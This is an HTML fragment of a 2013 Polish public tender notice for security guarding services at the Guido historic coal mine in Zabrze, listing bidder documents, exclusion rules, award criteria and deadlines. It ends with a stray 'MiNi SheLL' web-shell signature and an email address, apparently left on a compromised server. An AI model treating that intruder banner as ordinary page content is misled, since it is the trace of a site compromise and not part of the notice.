<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany, jakie można wprowadzić do umowy o zamówienie publiczne:
1. Zamawiający przewiduje  możliwość dokonania istotnych zmian postanowień zawartej  umowy  w  stosunku do treści  oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:
1) zmiany personelu Wykonawcy lub Zamawiającego na skutek zdarzeń losowych, zmian kadrowo - personalnych, utraty wymaganych uprawnień, utraty stanowiska; zmiana personelu Wykonawcy może nastąpić wyłącznie pod warunkiem okazania uprawnień co najmniej równoważnych,
2) zmiany podwykonawców pod warunkiem, że nowy podwykonawca wykaże  spełnianie warunków  wskazanych w opisie przedmiotu zamówienia w zakresie nie mniejszym niż wymagane w SIWZ,
3) wprowadzenie dodatkowego personelu Wykonawcy z przyczyn o obiektywnym charakterze zaakceptowanych przez Zamawiającego pod warunkiem spełnienia  warunków w zakresie nie mniejszym niż wymagane w SIWZ,
4) ustawowa zmiana stawki podatku VAT, której zastosowania nie będzie skutkowało zmianą wartości brutto umowy,
5) ograniczenia przedmiotu zamówienia, w szczególności  w przypadku kiedy Zamawiający nie mógł takiej sytuacji przewidzieć,
6) zmiany nazwy, adresu, numeru RIK, numeru NIP i REGON oraz osób reprezentujących Zamawiającego,
7) sposobu fakturowania i realizowania płatności za wykonane usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniaguido.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zabytkowej Kopalni Węgla Kamiennego Guido  w Zabrzu, przy ul. Jodłowej 59, 41-800 Zabrze (sekretariat pok. 102)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2013 godzina 10:00, miejsce: Zabytkowej Kopalni Węgla Kamiennego Guido  w Zabrzu, przy ul. Jodłowej 59, 41-800 Zabrze (sekretariat pok. 102)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Termin wykonania zamówienia
Wykonawca zrealizuje przedmiot zamówienia w nieprzekraczalnym terminie:
nie wcześniej niż 01.03.2013 r. do dnia 31.05.2014 r.
II. Przed zawarciem umowy Wykonawca zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 5 % ceny całkowitej podanej w ofercie.
III. Opis kryteriów, którymi Zamawiający będzie się kierował przy wyborze oferty, wraz z podaniem znaczenia tych kryteriów oraz sposobu oceny ofert.

1. Cena za ochronę osób i mienia realizowana przez licencjonowanego pracownika ochrony - 60%;
2. Cena za ochronę osób i mienia realizowana przez licencjonowanego pracownika ochrony wraz z systemem telewizji przemysłowej stanowiącej własność Wykonawcy - 30%;
3. Cena za ochronę w czasie zorganizowanych imprez - 10%.
IV. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
V. Zamawiający oceni spełnienie przez Wykonawcę warunków udziału w postępowaniu stwierdzeniem: -spełnia-  lub -nie spełnia-, w oparciu o wymagane oświadczenia, dokumenty i zawarte w nich informacje.
VI. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 2 ust. 1 Rozporządzenia Prezesa Rady Ministrów w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226 poz. 1817).:
1) pkt 2-4 i 6 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2) pkt 5 - składa zaświadczenie właściwego organu sadowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
Dokumenty, o których mowa w pkt 1) lit. a i c oraz pkt 2), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w pkt. 1 pkt 1) lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis pkt. 2 stosuje się odpowiednio.
VII. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia ustanawiają pełnomocnika 
- do reprezentowania ich w postępowaniu o udzielenie zamówienia - w tym złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu w imieniu i na rzecz Wykonawców wspólnie ubiegających się o udzielenie zamówienia, albo
- reprezentowania w postępowaniu - w tym złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu w imieniu i na rzecz Wykonawców wspólnie ubiegających się o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com